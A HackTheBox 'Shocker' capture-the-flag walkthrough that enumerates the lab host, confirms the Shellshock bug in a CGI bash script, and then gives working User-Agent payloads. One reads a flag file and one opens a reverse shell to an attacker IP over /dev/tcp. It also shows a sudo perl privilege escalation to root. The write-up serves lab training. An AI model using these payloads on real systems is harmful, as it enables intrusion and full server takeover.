HackTheBox Shocker Walkthrough
Enjoy reading my HTB Shocker Writeup
Information Gathering
Let's begin with a basic nmap scan to gain information about the services running on HTB Shocker.
sudo nmap -p 1-5000 -sV -sC -v 10.10.10.56
This reveals two services:
- Port 80: Apache httpd 2.4.18 (Ubuntu)
- Port 2222: OpenSSH 7.2p2
The website contains some basic HTML code to display an image, nothing else.
Using gobuster we can search for hidden directories and files:
gobuster dir -u http://10.10.10.56 -w Lists/gobuster/directory.txt
This didn't return any directories and gobuster had some errors with displaying custom status codes so I switched to dirbuster.
Dirbuster then revealed the /cgi-bin/
directory with the response code 403 which means we do not have access to it.
Now that we know that this directory exists, let's try to find files through brute-forcing instead of indexing using standard extensions and gobuster or dirbuster:
gobuster dir -u http://10.10.10.56/cgi-bin/ -x txt,sh,pl,tar.gz,bak -w /Lists/gobuster/directory.txt
Through that I found a file called user.sh
that included the following content:
0Content-Type: text/plain
1
2Just an uptime test script
3
4 18:51:55 up 53 min, 0 users, load average: 1.16, 0.68, 0.35
ShellShock
Shellshock is a vulnerability discovered in Septemer 2014 that allows arbitrary code execution on servers that use Bash for processing requests.
As we have a bash script lying on the webserver and the name is HackTheBox Shock, this host might be vulnerable to CVE-2014-6271.
nmap's scripting engine contains a script (http-shellshock.nse
) which we are going to use for further investigation.
With nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
we can let nmap check whether the target is vulnerable or not.
According to nmap it should be exploitable:
0PORT STATE SERVICE VERSION
180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2|_http-server-header: Apache/2.4.18 (Ubuntu)
3| http-shellshock:
4| VULNERABLE:
5| HTTP Shellshock vulnerability
6| State: VULNERABLE (Exploitable)
7| IDs: CVE:CVE-2014-6271
8| This web application might be affected by the vulnerability known
9| as Shellshock. It seems the server is executing commands injected
10| via malicious HTTP headers.
I configured a redirect on burpsuite to take a look at the exact request made by nmap and the response of the webserver:
As we only need one of them I removed Cookie and Referer to keep the request a bit cleaner.
I then rewrote the payload to: { :;}; echo; ls
which resulted in a 200 but didn't output anything.
Changing ls
to /bin/ls
then worked.
Using ls you are able to navigate through the filesystem and with the following payload you can read the userflag:
User-Agent: () { :;}; echo; /bin/cat ../../../home/shelly/user.txt
Another way would be gaining foothold first by gaining a reverse shell; this can be done with this payload:
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.180/4545 0>&1
Privilege Escalation
After obtaining the reverse shell I checked if there are executables that we are allowed to execute as root without a password using: sudo -l
.
0shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
1sudo -l
2Matching Defaults entries for shelly on Shocker:
3 env_reset, mail_badpass,
4 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
5
6User shelly may run the following commands on Shocker:
7 (root) NOPASSWD: /usr/bin/perl
perl can be used for escalating our privileges (gtfobins here)
e.g. with: sudo perl -e 'exec "/bin/bash";'
Finally, you are able to navigate into the root directory and take a look at the system flag.
Tags:
HTB, HackTheBox, Shocker, Walkthrough